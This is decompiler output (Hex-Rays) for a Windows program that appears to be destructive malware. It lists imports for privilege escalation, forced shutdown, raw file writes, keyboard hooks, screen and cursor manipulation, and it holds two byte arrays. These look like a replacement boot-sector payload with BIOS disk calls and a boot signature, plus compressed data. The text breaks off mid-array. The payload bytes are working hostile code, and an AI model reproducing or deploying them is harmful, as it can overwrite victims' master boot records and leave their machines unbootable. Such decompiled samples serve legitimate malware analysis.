/* This file was generated by the Hex-Rays decompiler version 9.4.0.260610.
   Copyright (c) 2007-2025 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

LRESULT __stdcall sub_401000(HWND a1, UINT a2, WPARAM a3, LPARAM a4);
// BOOL __usercall sub_401021@<eax>(int a1@<ebp>);
DWORD __stdcall StartAddress(LPVOID lpThreadParameter); // idb
void __stdcall __noreturn sub_40114A(LPVOID lpThreadParameter);
void __noreturn start(); // weak
int __cdecl sub_4014CA(int a1);
int __cdecl sub_40153B(int a1, int a2);
int sub_4015A2();
int __cdecl sub_4015F8(int a1);
int sub_401656();
int __thiscall sub_401667(void *this);
int __cdecl sub_401694(int a1);
int __thiscall sub_40176C(void *this);
int __cdecl sub_4017B0(int a1);
int __cdecl sub_40182D(int a1);
BOOL __stdcall EnumFunc(HWND hWnd, LPARAM a2); // idb
HWND __cdecl sub_401916(HWND hWnd);
DWORD __stdcall sub_401978(LPVOID lpThreadParameter); // idb
LRESULT __thiscall fn(void *this, int code, WPARAM wParam, LPARAM lParam);
void __stdcall __noreturn sub_401A0F(int (__cdecl *lpThreadParameter)(int, int));
int __fastcall sub_401A37(int a1);
int __cdecl sub_401A82(LPCWSTR lpString); // idb
// int __usercall sub_401AE6@<eax>(double a1@<st0>);
// HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
// BOOL __stdcall Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
// BOOL __stdcall Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
// int __stdcall GetProcessImageFileNameA(_DWORD, _DWORD, _DWORD); weak

//-------------------------------------------------------------------------
// Data declarations

// extern BOOL (__stdcall *OpenProcessToken)(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
// extern BOOL (__stdcall *AdjustTokenPrivileges)(HANDLE TokenHandle, BOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
// extern BOOL (__stdcall *LookupPrivilegeValueA)(LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
// extern BOOL (__stdcall *CryptAcquireContextA)(HCRYPTPROV *phProv, LPCSTR szContainer, LPCSTR szProvider, DWORD dwProvType, DWORD dwFlags);
// extern BOOL (__stdcall *CryptGenRandom)(HCRYPTPROV hProv, DWORD dwLen, BYTE *pbBuffer);
// extern BOOL (__stdcall *BitBlt)(HDC hdc, int x, int y, int cx, int cy, HDC hdcSrc, int x1, int y1, DWORD rop);
// extern BOOL (__stdcall *StretchBlt)(HDC hdcDest, int xDest, int yDest, int wDest, int hDest, HDC hdcSrc, int xSrc, int ySrc, int wSrc, int hSrc, DWORD rop);
// extern BOOL (__stdcall *WriteFile)(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
// extern BOOL (__stdcall *CloseHandle)(HANDLE hObject);
// extern int (__stdcall *lstrcmpA)(LPCSTR lpString1, LPCSTR lpString2);
// extern int (__stdcall *lstrcmpW)(LPCWSTR lpString1, LPCWSTR lpString2);
// extern HMODULE (__stdcall *LoadLibraryA)(LPCSTR lpLibFileName);
// extern DWORD (__stdcall *GetModuleFileNameA)(HMODULE hModule, LPSTR lpFilename, DWORD nSize);
// extern LPWSTR (__stdcall *GetCommandLineW)();
// extern void (__stdcall *Sleep)(DWORD dwMilliseconds);
// extern BOOL (__stdcall *SetPriorityClass)(HANDLE hProcess, DWORD dwPriorityClass);
// extern HGLOBAL (__stdcall *GlobalAlloc)(UINT uFlags, SIZE_T dwBytes);
// extern HGLOBAL (__stdcall *GlobalFree)(HGLOBAL hMem);
// extern int (__stdcall *lstrlenW)(LPCWSTR lpString);
// extern DWORD (__stdcall *GetCurrentThreadId)();
// extern HANDLE (__stdcall *CreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
// extern void (__stdcall __noreturn *ExitProcess)(UINT uExitCode);
// extern HANDLE (__stdcall *GetCurrentProcess)();
// extern HANDLE (__stdcall *OpenProcess)(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
// extern HLOCAL (__stdcall *LocalFree)(HLOCAL hMem);
// extern HLOCAL (__stdcall *LocalAlloc)(UINT uFlags, SIZE_T uBytes);
// extern HANDLE (__stdcall *CreateFileA)(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
// extern FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
// extern LPWSTR *(__stdcall *CommandLineToArgvW)(LPCWSTR lpCmdLine, int *pNumArgs);
// extern HINSTANCE (__stdcall *ShellExecuteA)(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
// extern BOOL (__stdcall *ShellExecuteExA)(SHELLEXECUTEINFOA *pExecInfo);
// extern int (__stdcall *ReleaseDC)(HWND hWnd, HDC hDC);
// extern BOOL (__stdcall *GetWindowRect)(HWND hWnd, LPRECT lpRect);
// extern int (__stdcall *MessageBoxW)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType);
// extern BOOL (__stdcall *SetCursorPos)(int X, int Y);
// extern BOOL (__stdcall *GetCursorPos)(LPPOINT lpPoint);
// extern HWND (__stdcall *GetDesktopWindow)();
// extern BOOL (__stdcall *EnumWindows)(WNDENUMPROC lpEnumFunc, LPARAM lParam);
// extern HWND (__stdcall *GetWindow)(HWND hWnd, UINT uCmd);
// extern LRESULT (__stdcall *CallNextHookEx)(HHOOK hhk, int nCode, WPARAM wParam, LPARAM lParam);
// extern HDC (__stdcall *GetWindowDC)(HWND hWnd);
// extern BOOL (__stdcall *UnhookWindowsHookEx)(HHOOK hhk);
// extern int (__stdcall *GetSystemMetrics)(int nIndex);
// extern HWND (__stdcall *CreateWindowExA)(DWORD dwExStyle, LPCSTR lpClassName, LPCSTR lpWindowName, DWORD dwStyle, int X, int Y, int nWidth, int nHeight, HWND hWndParent, HMENU hMenu, HINSTANCE hInstance, LPVOID lpParam);
// extern ATOM (__stdcall *RegisterClassExA)(const WNDCLASSEXA *);
// extern LRESULT (__stdcall *DefWindowProcA)(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
// extern BOOL (__stdcall *ExitWindowsEx)(UINT uFlags, DWORD dwReason);
// extern LRESULT (__stdcall *DispatchMessageA)(const MSG *lpMsg);
// extern BOOL (__stdcall *TranslateMessage)(const MSG *lpMsg);
// extern BOOL (__stdcall *DrawIcon)(HDC hDC, int X, int Y, HICON hIcon);
// extern UINT (__stdcall *SendInput)(UINT cInputs, LPINPUT pInputs, int cbSize);
// extern HICON (__stdcall *LoadIconA)(HINSTANCE hInstance, LPCSTR lpIconName);
// extern LRESULT (__stdcall *SendMessageW)(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
// extern BOOL (__stdcall *GetMessageA)(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax);
// extern HHOOK (__stdcall *SetWindowsHookExA)(int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId);
// extern BOOL (__stdcall *PlaySoundA)(LPCSTR pszSound, HMODULE hmod, DWORD fdwSound);
_BYTE byte_4021F8[304] =
{
  -69,
  -32,
  7,
  -114,
  -61,
  -114,
  -37,
  -72,
  4,
  2,
  -71,
  2,
  0,
  -74,
  0,
  -69,
  0,
  0,
  -51,
  19,
  49,
  -64,
  -119,
  -61,
  -119,
  -63,
  -119,
  -62,
  -66,
  0,
  0,
  -65,
  0,
  64,
  -84,
  -127,
  -2,
  -98,
  7,
  115,
  53,
  60,
  128,
  115,
  3,
  -23,
  16,
  0,
  36,
  127,
  -120,
  -63,
  -84,
  -86,
  -2,
  -55,
  128,
  -7,
  -1,
  117,
  -9,
  -23,
  -30,
  -1,
  -120,
  -60,
  -84,
  -119,
  -61,
  -84,
  -119,
  -14,
  -119,
  -34,
  -127,
  -58,
  0,
  64,
  -120,
  -63,
  -84,
  -86,
  -2,
  -55,
  128,
  -7,
  0,
  117,
  -9,
  -119,
  -42,
  -23,
  -60,
  -1,
  -80,
  -74,
  -26,
  67,
  -72,
  3,
  16,
  -77,
  0,
  -51,
  16,
  -65,
  0,
  0,
  -70,
  -64,
  -99,
  -71,
  0,
  -72,
  -114,
  -63,
  -72,
  0,
  0,
  -71,
  -48,
  7,
  -13,
  -85,
  -66,
  -100,
  -97,
  -65,
  0,
  0,
  -28,
  97,
  12,
  3,
  -26,
  97,
  -77,
  1,
  82,
  -76,
  -122,
  -71,
  0,
  0,
  -70,
  0,
  96,
  -51,
  21,
  90,
  -127,
  -2,
  -24,
  -97,
  125,
  4,
  -84,
  -76,
  -16,
  -85,
  -2,
  -53,
  128,
  -5,
  0,
  117,
  -29,
  86,
  -119,
  -42,
  -83,
  -119,
  -63,
  128,
  -28,
  31,
  -26,
  66,
  -120,
  -32,
  -26,
  66,
  -64,
  -19,
  5,
  -64,
  -27,
  2,
  -120,
  -21,
  -119,
  -14,
  94,
  -127,
  -6,
  -12,
  -99,
  117,
  -61,
  -66,
  0,
  64,
  -65,
  0,
  0,
  -72,
  -32,
  7,
  -114,
  -40,
  -72,
  0,
  -72,
  -114,
  -64,
  -2,
  -53,
  -23,
  32,
  0,
  -80,
  -36,
  -86,
  -84,
  -86,
  -127,
  -2,
  -64,
  -99,
  116,
  66,
  -127,
  -1,
  -96,
  15,
  116,
  3,
  -23,
  -20,
  -1,
  82,
  -76,
  -122,
  -71,
  1,
  0,
  -70,
  0,
  96,
  -51,
  21,
  90,
  -65,
  0,
  0,
  -127,
  -6,
  -100,
  -97,
  117,
  3,
  -70,
  -12,
  -99,
  -2,
  -53,
  128,
  -5,
  0,
  117,
  -51,
  86,
  -119,
  -42,
  -83,
  -119,
  -63,
  128,
  -28,
  31,
  -26,
  66,
  -120,
  -32,
  -26,
  66,
  -64,
  -19,
  5,
  -120,
  -21,
  -119,
  -14,
  94,
  -23,
  -77,
  -1,
  -66,
  0,
  64,
  -23,
  -63,
  -1,
  0
}; // weak
char byte_402328[1952] =
{
  'U',
  '\xAA',
  '\x83',
  '\x11',
  '\x11',
  '\x11',
  '\x11',
  '\0',
  '\0',
  '\x04',
  '\0',
  '\0',
  '\b',
  '\0',
  '\0',
  '\x10',
  '\0',
  '\0',
  ' ',
  '\0',
  '5',
  '\v',
  '\x83',
  '\xF1',
  '\xF1',
  '\x11',
  '\xF1',
  '\0',
  '\0',
  'K',
  '\0',
  '\x96',
  '\x04',
  '\x80',
  '\xFF',
  '\0',
  'O',
  'O',
  '\0',
  '\x9F',
  'O',
  '\0',
  '\xEA',
  'S',
  '\x82',
  '\x1F',
  '\xF1',
  '\x1F',
  '\x01',
  'B',
  'N',
  '\0',
  'N',
  'P',
  '\x02',
  '\x12',
  '\x1F',
  '\x83',
  '\x10',
  '\x10',
  '\x10',
  '\x10',
  '\x02',
  'P',
  '\x04',
  '\x02',
  'P',
  '\b',
  '\x80',
  '\x10',
  '\x02',
  '1',
  '\x1F',
  '\x83',
  '\x14',
  '\x14',
  '\x14',
  '\x14',
  '\x02',
  '\x80',
  '\x04',
  '\x83',
  'D',
  'D',
  'D',
  'D',
  '\x02',
  '\x88',
  '\x04',
  '\x02',
  '\x80',
  '\x0E',
  '\x87',
  '@',
  '\x0E',
  '\xEE',
  '\xEE',
  '\xED',
  '\xED',
  '\xED',
  '\xED',
  '\x02',
  '\xA2',
  '\x04',
  '\x02',
  '\xA5',
  '\x05',
  '\x82',
  '\xEE',
  '\xEE',
  '\x0E',
  '\x02',
  '`',
  '\x1E',
  '\x02',
  '\x88',
  '\b',
  '\x83',
  'F',
  'F',
  'F',
  'F',
  '\x02',
  '\xD8',
  '\x04',
  '\x02',
  '\xD0',
  '\x0E',
  '\x8C',
  '\0',
  '\xEE',
  '\xED',
  '\xDD',
  '\xDC',
  '\xDD',
  '\xDD',
  '\xDD',
  '\xDD',
  '\xCD',
  '\xDD',
  '\xDD',
  '\xCD',
  '\x02',
  '\xF3',
  '\x04',
  '\x83',
  '\xDD',
  '\xED',
  '\xEE',
  '\0',
  '\x02',
  '\xB3',
  '\x1D',
  '\x83',
  'f',
  'f',
  'f',
  'f',
  '\x03',
  ' ',
  '\x04',
  '\x03',
  ' ',
  '\b',
  '\x03',
  '\"',
  '\x0E',
  '\x81',
  '\0',
  '\xEE',
  '\x02',
  '\xFB',
  '\x05',
  '\x03',
  'A',
  '\x04',
  '\x83',
  '\xD0',
  '\a',
  '\a',
  '\xD0',
  '\x02',
  '\xF9',
  '\x04',
  '\x84',
  '\xEE',
  '\0',
  '\x10',
  '\a',
  '\a',
  '\x02',
  '\xB2',
  '\x1A',
  '\x83',
  'n',
  'n',
  'n',
  'n',
  '\x03',
  'p',
  '\x04',
  '\x83',
  '\xEE',
  '\xEE',
  '\xEE',
  '\xEE',
  '\x03',
  'x',
  '\x04',
  '\x03',
  'p',
  '\b',
  '\x85',
  '\0',
  '\a',
  '\a',
  '\0',
  '\xE0',
  '\xEE',
  '\x03',
  '>',
  '\b',
  '\x8F',
  '\xCD',
  '\xDD',
  '\xDD',
  '\0',
  'w',
  'w',
  'w',
  '\a',
  '\xD0',
  '\xD0',
  '\xD0',
  '\xE0',
  '\a',
  'w',
  'w',
  'w',
  '\x03',
  '\x02',
  '\x1A',
  '\x03',
  'x',
  '\b',
  '\x83',
  '\xEA',
  '\xEA',
  '\xEA',
  '\xEA',
  '\x03',
  '\xC8',
  '\x04',
  '\x03',
  '\xC0',
  '\b',
  '\x85',
  '\n',
  '\0',
  'p',
  'w',
  '\a',
  '\0',
  '\x03',
  '\x8E',
  '\x05',
  '\x02',
  '\xFA',
  '\x04',
  '\x81',
  '\xDC',
  '\xD0',
  '\x03',
  '\xA2',
  '\x04',
  '\x80',
  'w',
  '\x03',
  '\xEA',
  '\x04',
  '\x03',
  '\xEE',
  '\x04',
  '\x03',
  'U',
  '\x1A',
  '\x83',
  '\xAA',
  '\xAA',
  '\xAA',
  '\xAA',
  '\x04',
  '\x10',
  '\x04',
  '\x04',
  '\x10',
  '\b',
  '\x04',
  '\x16',
  '\n',
  '\x85',
  '\n',
  '\0',
  'p',
  'p',
  '\0',
  '\xEE',
  '\x02',
  '\xF9',
  '\a',
  '\x03',
  '\x98',
  '\x05',
  '\x80',
  '\xF0',
  '\x04',
  '8',
  '\x04',
  '\x80',
  'p',
  '\x04',
  ';',
  '\x05',
  '\x03',
  '\xA6',
  '\x19',
  '\x83',
  '\xA3',
  '\xA3',
  '\xA3',
  '\xA3',
  '\x04',
  '`',
  '\x04',
  '\x83',
  '3',
  '3',
  '3',
  '3',
  '\x04',
  'h',
  '\x04',
  '\x04',
  '`',
  '\r',
  '\x83',
  '\x03',
  '\0',
  '\xEE',
  '\xDE',
  '\x02',
  '\xF1',
  '\x04',
  '\x03',
  '\x96',
  '\a',
  '\x81',
  'w',
  'p',
  '\x04',
  '?',
  '\x04',
  '\x04',
  '\x8C',
  '\x04',
  '\x04',
  'F',
  '\x1A',
  '\x04',
  'h',
  '\b',
  '\x87',
  '9',
  '9',
  '9',
  '9',
  '\xF9',
  '9',
  '9',
  '9',
  '\x04',
  '\xB0',
  '\f',
  '\x9A',
  '9',
  '0',
  '\0',
  '\xE0',
  '\xEE',
  '\xEE',
  '\xDE',
  '\xDE',
  '\xDE',
  '\xDE',
  '\xDE',
  '\xDE',
  '\xDE',
  '\x0E',
  'p',
  'w',
  'w',
  '\a',
  '\a',
  '\a',
  '\a',
  '\a',
  '\a',
  '\a',
  'w',
  'p',
  '\x01',
  '\x03',
  '\xA7',
  '\x19',
  '\x83',
  '\x99',
  '\x99',
  '\x99',
  '\x99',
  '\x05',
  '\0',
  '\x04',
  '\x81',
  '\x99',
  '\x9F',
  '\x05',
  '\x04',
  '\x06',
  '\x05',
  '\0',
  '\t',
  '\x88',
  '\x99',
  '\x99',
  '\x99',
  '\0',
  'w',
  'w',
  'p',
  '\0',
  '\x01',
  '\x03',
  '\x88',
  '\x04',
  '\x83',
  '\x01',
  '\x01',
  '\x01',
  '\x01',
  '\x05',
  '!',
  '\x06',
  '\x05',
  '+',
  '\x05',
  '\x03',
  '\x05',
  '\x1B',
  '\x83',
  '\x91',
  '\x91',
  '\x91',
  '\x91',
  '\x05',
  'P',
  '\x04',
  '\x05',
  'H',
  '\x10',
  '\x05',
  '\\',
  '\x04',
  '\x05',
  '\'',
  '\x04',
  '\x05',
  'j',
  '\x05',
  '\x05',
  'Y',
  '\a',
  '\x05',
  'm',
  '\a',
  '\x01',
  '\xB8',
  '\x98',
  '\0',
  '\x9F',
  '\xF1',
  '\x06',
  '\x99',
  's',
  '\x05',
  '\xAC',
  '\x93',
  '\a',
  '\x7F',
  '\x06',
  '\a',
  '\x7F',
  'K',
  '\x82',
  '\xF1',
  '\x11',
  '\x1F',
  '\x05',
  '\xAB',
  '\xFF',
  '\b',
  '\xAA',
  '\xBB',
  '\x02',
  'P',
  '\xF9',
  '\x03',
  'H',
  '\x05',
  '\x03',
  'N',
  '\x05',
  '\x80',
  '\x11',
  '\x03',
  'S',
  '\x1C',
  '\x03',
  'p',
  '\x18',
  '\x84',
  '\xEE',
  '\xE0',
  '\xE0',
  '\xEE',
  '\xEE',
  '\x03',
  '\x8D',
  '\f',
  '\x03',
  '\x98',
  '\b',
  '\x81',
  '\xE0',
  '\0',
  '\x03',
  '\xA2',
  '\x1D',
  '\x03',
  '\xC0',
  '\x18',
  '\x04',
  'D',
  '\x04',
  '\x81',
  '\xE0',
  '\xE0',
  '\x03',
  '\xDE',
  '\n',
  '\x80',
  '\xDD',
  '\x03',
  '\xE8',
  '\'',
  '\x04',
  '\x11',
  '\x1A',
  '\x83',
  'p',
  'p',
  'w',
  'w',
  '\x04',
  '.',
  '\n',
  '\x04',
  '7',
  '(',
  '\x04',
  '`',
  '\x1C',
  '\x80',
  '\x03',
  '\x04',
  '}',
  '\v',
  '\x04',
  '\x87',
  '(',
  '\x04',
  '\xC0',
  '\r',
  '\x04',
  '\xBD',
  '\x10',
  '\x80',
  '9',
  '\x04',
  '\xCE',
  '\v',
  '\x04',
  '\xD8',
  '\'',
  '\x05',
  '\x10',
  '\f',
  '\f',
  '\xD0',
  '\f',
  '\x05',
  '\x17',
  '\b',
  '\x05',
  ' ',
  '\v',
  '\x05',
  '*',
  '%',
  '\x05',
  'b',
  '\x06',
  '\x80',
  '\xF1',
  '\x05',
  'W',
  '\x15',
  '\x05',
  'q',
  '\a',
  '\x05',
  'r',
  '\x11',
  '\x05',
  '\x82',
  '*',
  '\x05',
  '\xAD',
  '\xFF',
  '\x06',
  '\xB1',
  '\xFF',
  '\a',
  '\xB5',
  '\xAE',
  '\x81',
  '\x11',
  '\x11',
  '\x01',
  '\x92',
  'O',
  '\0',
  '\xDC',
  '\xB5',
  '\x0E',
  '\xFC',
  '\x9C',
  '\0',
  'K',
  'T',
  '\n',
  'Y',
  '\x15',
  '\x12',
  '%',
  '\n',
  '\x84',
  '\x10',
  '\x0E',
  '\x0E',
  '\x0E',
  '\x0E',
  '\x12',
  '@',
  '\x04',
  '\x12',
  '@',
  '\b',
  '\n',
  '\x81',
  '\x1F',
  '\x80',
  '\x11',
  '\n',
  '\xA9',
  '\x15',
  '\x12',
  'u',
  '\t',
  '\x83',
  '\0',
  '\xEE',
  '\xEE',
  '\xED',
  '\f',
  '\x04',
  '\x05',
  '\x80',
  '\xDC',
  '\v',
  '\xB5',
  '\x04',
  '\n',
  '\xCD',
  '\x05',
  '\n',
  '\xD1',
  'A',
  '\f',
  '\x01',
  '\b',
  '\x82',
  '\xDD',
  '\xD0',
  '\xD0',
  '\x12',
  '\x99',
  '\x04',
  '\x12',
  '\xA1',
  '\x04',
  '\n',
  '/',
  '\x1B',
  '\v',
  'I',
  '\x10',
  '\x13',
  '\x10',
  '\x0E',
  '\v',
  '^',
  '\b',
  '\x12',
  '\x9A',
  '\x04',
  '\x80',
  '\0',
  '\v',
  'l',
  '\x04',
  '\x03',
  'O',
  '\x06',
  '\v',
  'u',
  '\x1B',
  '\v',
  '\x99',
  '\x0F',
  '\v',
  '\x98',
  '\x0F',
  '\x13',
  '.',
  '\x05',
  '\x12',
  '\x9A',
  '\x05',
  '\f',
  'W',
  '\a',
  '\f',
  '\xB1',
  '\x05',
  '\v',
  't',
  '\x1C',
  '\x04',
  '\x10',
  '\x1A',
  '\x82',
  '\xA0',
  '\xA0',
  '\xA0',
  '\x03',
  '\xDD',
  '\x04',
  '\x13',
  '\x83',
  '\x06',
  '\x80',
  '\xCD',
  '\x13',
  '\x89',
  '\x05',
  '\x80',
  '\x7F',
  '\f',
  'd',
  '\x04',
  '\x13',
  '\xDB',
  '\x06',
  '\f',
  'h',
  '\x1F',
  '\f',
  '0',
  '\x11',
  '\v',
  'r',
  '\x04',
  '\x04',
  ',',
  '\x05',
  '\x13',
  '2',
  '\v',
  '\x80',
  'w',
  '\x13',
  '\x91',
  '\x05',
  '\x80',
  '\a',
  '\x14',
  ',',
  '\x05',
  '\x13',
  '\xE8',
  '\x18',
  '\f',
  '\x89',
  '\x15',
  '\x14',
  'U',
  '\x04',
  '\x88',
  '\x03',
  '\x03',
  '\x03',
  '\x03',
  '3',
  '\0',
  '\xEE',
  '\xEE',
  '\xDE',
  '\x12',
  '\xE2',
  '\a',
  '\x80',
  '\r',
  '\f',
  'd',
  '\x05',
  '\x81',
  'p',
  'p',
  '\x04',
  '+',
  '\x04',
  '\x80',
  'w',
  '\f',
  '\xB5',
  '\x1A',
  '\x05',
  '\x0E',
  '\x0E',
  '\f',
  '\xDD',
  '\x11',
  '\x84',
  '\a',
  '\xE0',
  '\xE0',
  '\xE0',
  '\xE0',
  '\x14',
  '\xC0',
  '\x04',
  '\x87',
  '\xE0',
  '\xE0',
  '\xE0',
  '\0',
  'p',
  'p',
  'p',
  'p',
  '\x14',
  '\xCC',
  '\x04',
  '\x80',
  'p',
  '\x04',
  '\xE5',
  '\x1B',
  '\x81',
  '\xF1',
  '\x1F',
  '\x11',
  '\xCF',
  '\x05',
  '\x05',
  'P',
  '\x17',
  '\x80',
  '\0',
  '\x14',
  '\xD4',
  '\x04',
  '\x82',
  '\x01',
  'p',
  'p',
  '\x14',
  '8',
  '\a',
  '\x15',
  '\x13',
  '\x05',
  '\x15',
  '\x13',
  '\n',
  '\x05',
  '\xAD',
  '\xFF',
  '\x0F',
  '\xE2',
  '\xE7',
  '\x0F',
  '\xD9',
  '\x93',
  '\x05',
  '\xAC',
  '\xFF',
  '\x16',
  '#',
  '\xA0',
  '\x17',
  '\xA5',
  '\x04',
  '\b',
  '\x18',
  'M',
  '\b',
  '\x14',
  '[',
  '\x12',
  ' ',
  '\xFF',
  '\x13',
  '\x1F',
  '\xAD',
  '\x81',
  '\a',
  '\a',
  '\x13',
  '\xCE',
  'J',
  '\x83',
  '\xA0',
  '\a',
  'w',
  'p',
  '\x14',
  '\x1C',
  'L',
  '\x84',
  '\x03',
  'p',
  'p',
  '\x03',
  '3',
  '\x14',
  'm',
  '4',
  '\x14',
  '\xA2',
  '\x1C',
  '\x81',
  '\x90',
  '\a',
  '\x14',
  '\xBF',
  '1',
  '\x05',
  'I',
  '\x1D',
  '\x15',
  '\x0E',
  '\xFF',
  '\x18',
  '\x97',
  '\xFF',
  '\b',
  '\x15',
  '\x94',
  '\x14',
  '\xF0',
  '\a',
  '\x05',
  '\xAD',
  '\xFF',
  '\x16',
  '-',
  '\xFF',
  ' ',
  '\x84',
  'L',
  '\n',
  'P',
  '\x1E',
  '\x81',
  'D',
  '@',
  '\x1A',
  '\x10',
  '0',
  '\n',
  '\xA0',
  ' ',
  '\x1A',
  '`',
  'Z',
  '\x81',
  '\xD0',
  '\xD0',
  '\"',
  '8',
  '\x05',
  '\v',
  '!',
  '\x04',
  '!',
  '\xF1',
  '\x1B',
  '\v',
  '@',
  '\x19',
  '\x1B',
  'I',
  '\n',
  '\"',
  '4',
  '\x06',
  '\x1B',
  '\n',
  '\a',
  '\x81',
  '\xDD',
  '\xEE',
  '\x14',
  '\x18',
  '\x04',
  '\x03',
  '\xA6',
  '1',
  '\x81',
  '\xE0',
  '\a',
  '\x03',
  '\x89',
  '\x04',
  '\v',
  '\xAD',
  '\x06',
  '\x1B',
  '\xA1',
  '\x06',
  '\x1B',
  'Z',
  '&',
  '\x1B',
  '\x7F',
  '\x18',
  '\x81',
  '\n',
  '\n',
  '\x1C',
  '\xA2',
  '\x04',
  '\x1B',
  '\x9D',
  '\v',
  '\x1B',
  '\xA9',
  '\'',
  '\f',
  '/',
  '!',
  '\"',
  '\xD1',
  '\v',
  '\x1B',
  '\xFC',
  '$',
  '\f',
  '\x7F',
  '\x1E',
  '\x80',
  '0',
  '\x1C',
  '>',
  '\n',
  '\x1C',
  'I',
  '\'',
  '\x1C',
  'o',
  '\x1C',
  '\x80',
  '\x90',
  '#',
  '\x18',
  '\x06',
  '\x1C',
  '\x93',
  '.',
  '\x05',
  'P',
  '\x1B',
  '\x15',
  '\x0E',
  '\xFF',
  '\x10',
  '\xD9',
  '\xF8',
  '\x80',
  '\xF1',
  '&',
  'P',
  'M',
  '\0',
  '\x9E',
  'G',
  '\x82',
  '\xF1',
  '\xF1',
  '\x1F',
  '&',
  '\xA2',
  'N',
  '\x05',
  '\xAB',
  '\xFF',
  '\x06',
  '\xE0',
  '\xFF',
  '!',
  '\xB6',
  '\xD3',
  '\x03',
  'I',
  '\x05',
  '\"',
  '\x8E',
  '\x05',
  '\x03',
  'S',
  '5',
  '\v',
  'X',
  '\x0E',
  '#',
  '\xC5',
  '\b',
  '\x03',
  '\x9E',
  ':',
  '\v',
  '\xA8',
  '\v',
  '*',
  '\n',
  '\x05',
  '\x03',
  '\xE8',
  'A',
  '\v',
  '\xF9',
  '\b',
  '#',
  'q',
  '\v',
  '\x04',
  '<',
  '@',
  '#',
  '\xBC',
  '\x10',
  '\x04',
  '\x8C',
  '0',
  '#',
  '\xFC',
  '\x1C',
  '$',
  '\x17',
  '\x05',
  '\f',
  '\xAE',
  '\"',
  '\x80',
  '\x1F',
  '$',
  '@',
  '\x1D',
  '\x80',
  'w',
  '$',
  '^',
  '\f',
  '\x86',
  '\xE0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\0',
  '\f',
  '\xF4',
  '\x04',
  ')',
  '\f',
  '\x1B',
  '$',
  '\x90',
  ' ',
  ',',
  '{',
  '\x05',
  ',',
  'k',
  '\x05',
  '$',
  '\xAB',
  '\x0F',
  '\0',
  '8',
  '\xFF',
  '-',
  '\x19',
  '\x7F',
  ',',
  '\xFF',
  'N',
  '\'',
  '7',
  '\x98',
  '&',
  '\x9D',
  '\x9A',
  '\x05',
  '\xAD',
  '\xFF',
  '%',
  '\xF5',
  'Z',
  '\x1F',
  'o',
  '@',
  '\n',
  ' ',
  '0',
  '\x19',
  '\xF0',
  '\x1E',
  '\x80',
  '\x10',
  '\n',
  'o',
  '1',
  '\x1A',
  '@',
  ' ',
  '\x02',
  '\xF0',
  '\x80',
  '\x1A',
  '\xE0',
  '\x18',
  '\r',
  '\x01',
  '\x04',
  '\x80',
  '`',
  '\x1A',
  '\xFD',
  '\t',
  '\x03',
  '\x96',
  '*',
  '\x1B',
  '0',
  '\x18',
  '\x80',
  '\x0E',
  '\x03',
  '\xD9',
  '\x87',
  '\x1B',
  '\xD0',
  '\x18',
  '3',
  'J',
  '\x05',
  '\x04',
  '}',
  '3',
  '\x14',
  'P',
  '\x19',
  '3',
  '\x9B',
  '\x04',
  '\x04',
  '\xCD',
  ')',
  '0',
  '\xA1',
  '\n',
  '\f',
  '\xD1',
  '\x1F',
  '\x05',
  '\x1F',
  '%',
  '\x1E',
  '\x89',
  '\x13',
  ',',
  '`',
  '\x15',
  '\x05',
  'l',
  '\'',
  '\b',
  '\x12',
  '\xFF',
  '0',
  '3',
  '\xFD',
  '\a',
  '\xBE',
  '\xFF',
  '-',
  '\x1A',
  '\xFF',
  '.',
  '\x19',
  '\x93',
  '1',
  '6',
  '\v',
  '\x80',
  '\xF0',
  '1',
  '<',
  '\xED',
  '\v',
  '\x19',
  '\'',
  '\x1A',
  '\xE0',
  '\x19',
  '\x81',
  '`',
  '`',
  '\x1A',
  '\xFB',
  '\v',
  '\v',
  'f',
  '*',
  '2',
  '\xA0',
  '\x18',
  '\v',
  '\xA8',
  '\x88',
  '3',
  '@',
  '\x1C',
  '\f',
  'L',
  '4',
  '3',
  '\x90',
  '\x1D',
  '\x80',
  '3',
  '\f',
  '\x9E',
  '\x1F',
  '5',
  '\xE0',
  '\x13',
  '\f',
  '\xD0',
  'P',
  '$',
  '\x89',
  '\x1D',
  '\r',
  '=',
  '\x1D',
  '\x0F',
  '\xD9',
  '\xFF',
  '\x06',
  '\xBC',
  '\xFF',
  '\x0F',
  '\x88',
  '\xFF',
  '\x10',
  '\x84',
  '\xFF',
  '&',
  'T',
  '\xCA',
  '!',
  '\xC0',
  '\xCA',
  '\x1A',
  '\xBA',
  '&',
  '\"',
  '\xB0',
  ')',
  '\x1B',
  '\t',
  '\'',
  '*',
  '\xD0',
  '\x18',
  'B',
  'J',
  '\x06',
  '\x13',
  '~',
  '\x82',
  '+',
